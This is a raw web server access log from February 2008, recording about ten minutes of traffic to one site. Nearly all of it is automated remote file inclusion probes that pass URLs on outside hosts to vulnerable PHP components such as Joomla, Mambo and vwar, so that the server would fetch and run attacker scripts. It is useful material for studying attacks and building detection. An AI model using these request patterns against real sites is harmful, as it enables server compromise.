67.195.58.186 - - [25/Feb/2008:04:00:17 -0800] "GET /logs/access.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
60.248.89.72 - - [25/Feb/2008:04:00:23 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
60.248.89.72 - - [25/Feb/2008:04:00:23 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
80.67.21.105 - - [25/Feb/2008:04:00:23 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
80.67.21.105 - - [25/Feb/2008:04:00:25 -0800] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:01:20 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.215.56 - - [25/Feb/2008:04:01:54 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.193.215.56 - - [25/Feb/2008:04:01:54 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
213.193.215.56 - - [25/Feb/2008:04:01:55 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.randdesign.de/ppoint/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:02:00 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:02:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:02:02 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.158.11 - - [25/Feb/2008:04:02:24 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.158.11 - - [25/Feb/2008:04:02:24 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.29.0.28 - - [25/Feb/2008:04:02:26 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
200.29.0.28 - - [25/Feb/2008:04:02:27 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.237.158.11 - - [25/Feb/2008:04:02:27 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.215.56 - - [25/Feb/2008:04:02:31 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.193.215.56 - - [25/Feb/2008:04:02:32 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
213.193.215.56 - - [25/Feb/2008:04:02:32 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.randdesign.de/ppoint/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
58.26.137.64 - - [25/Feb/2008:04:02:38 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:04:02:54 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:02:59 -0800] "GET /logs/access_071214.log//skin/zero_vote/admin.php?dir=http://www.gressenberger.at/contenido//logs/ascomand.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:03:00 -0800] "GET //skin/zero_vote/admin.php?dir=http://www.gressenberger.at/contenido//logs/ascomand.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:03:00 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.gressenberger.at/contenido//logs/ascomand.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:03:12 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:03:13 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:03:14 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:04:03:24 -0800] "GET /logs/Bmodules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:04:03:25 -0800] "GET /Bmodules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:03:30 -0800] "GET /logs/access_080106.log//skin/zero_vote/admin.php?dir=http://www.gressenberger.at/contenido//logs/ascomand.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.162.98 - - [25/Feb/2008:04:03:44 -0800] "GET /logs/access_080103.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.162.98 - - [25/Feb/2008:04:03:44 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.162.98 - - [25/Feb/2008:04:03:44 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [25/Feb/2008:04:04:09 -0800] "GET /logs/access_080131.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [25/Feb/2008:04:04:09 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [25/Feb/2008:04:04:09 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.136.250.22 - - [25/Feb/2008:04:04:11 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://avvvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.136.250.22 - - [25/Feb/2008:04:04:14 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://avvvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.136.250.22 - - [25/Feb/2008:04:04:15 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://avvvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:04:18 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.237.158.11 - - [25/Feb/2008:04:04:26 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:04:04:27 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:04:04:27 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
80.237.158.11 - - [25/Feb/2008:04:04:31 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.67.26.200 - - [25/Feb/2008:04:04:39 -0800] "GET /logs/access_080103.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.72.15 - - [25/Feb/2008:04:04:46 -0800] "GET /logs/access_080123.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.225.221.84 - - [25/Feb/2008:04:05:24 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [25/Feb/2008:04:05:24 -0800] "GET /?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [25/Feb/2008:04:05:25 -0800] "GET /logs/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 200 36116 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [25/Feb/2008:04:05:26 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [25/Feb/2008:04:05:26 -0800] "GET /?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [25/Feb/2008:04:05:27 -0800] "GET /logs/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 200 36116 "-" "libwww-perl/5.805" "www.dmulk.com"
83.172.144.57 - - [25/Feb/2008:04:05:39 -0800] "GET /?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.144.57 - - [25/Feb/2008:04:05:39 -0800] "GET /?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.0.28 - - [25/Feb/2008:04:05:40 -0800] "GET //content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
200.29.0.28 - - [25/Feb/2008:04:05:40 -0800] "GET /logs//content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.114.141.100 - - [25/Feb/2008:04:05:46 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://www.runenversand.de/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
85.114.141.100 - - [25/Feb/2008:04:05:50 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://www.runenversand.de/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
85.214.93.154 - - [25/Feb/2008:04:05:54 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:06:08 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:06:10 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:06:10 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.225.221.84 - - [25/Feb/2008:04:06:12 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:06:12 -0800] "GET /logs//update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:06:12 -0800] "GET //update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
200.225.221.84 - - [25/Feb/2008:04:06:13 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.158.11 - - [25/Feb/2008:04:06:23 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.158.11 - - [25/Feb/2008:04:06:26 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:06:31 -0800] "GET /logs/access_080123.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.158.11 - - [25/Feb/2008:04:06:31 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.89.74.40 - - [25/Feb/2008:04:06:34 -0800] "GET /logs/access_080103.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [25/Feb/2008:04:06:34 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [25/Feb/2008:04:06:34 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.237.162 - - [25/Feb/2008:04:06:35 -0800] "GET /logs/access_080101.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.237.162 - - [25/Feb/2008:04:06:35 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.237.162 - - [25/Feb/2008:04:06:35 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.162.98 - - [25/Feb/2008:04:06:37 -0800] "GET /logs/access_080101.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:06:52 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:06:53 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:06:53 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.67.190 - - [25/Feb/2008:04:06:56 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.232.156.10 - - [25/Feb/2008:04:06:58 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
161.58.27.58 - - [25/Feb/2008:04:07:10 -0800] "GET /logs/access_080101.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [25/Feb/2008:04:07:11 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [25/Feb/2008:04:07:11 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:04:07:18 -0800] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:04:07:20 -0800] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.27.58 - - [25/Feb/2008:04:07:21 -0800] "GET /logs/access_080103.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [25/Feb/2008:04:07:21 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [25/Feb/2008:04:07:21 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.221.184.180 - - [25/Feb/2008:04:07:23 -0800] "GET /PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.143 - - [25/Feb/2008:04:07:37 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://img.mehriz.org/image/img/86b932fa9ed6cadc7bb3766f57f03a2b/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.103 - - [25/Feb/2008:04:07:39 -0800] "GET /logs/access_080101.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.22.204.103 - - [25/Feb/2008:04:07:39 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.22.204.103 - - [25/Feb/2008:04:07:39 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.237.158.11 - - [25/Feb/2008:04:07:45 -0800] "GET /logs/access_071230.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:04:08:05 -0800] "GET /logs/access_080121.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:04:08:06 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:04:08:06 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.67.190 - - [25/Feb/2008:04:08:08 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.66.23.74 - - [25/Feb/2008:04:08:27 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://www.runenversand.de/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.66.23.74 - - [25/Feb/2008:04:08:28 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://www.runenversand.de/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:09:01 -0800] "GET /logs/access_080123.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.162.98 - - [25/Feb/2008:04:09:20 -0800] "GET /logs/access_080103.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.162.98 - - [25/Feb/2008:04:09:20 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.162.98 - - [25/Feb/2008:04:09:21 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:04:09:55 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.202 - - [25/Feb/2008:04:10:22 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.202 - - [25/Feb/2008:04:10:23 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.202 - - [25/Feb/2008:04:10:23 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.10 - - [25/Feb/2008:04:10:35 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:10:48 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
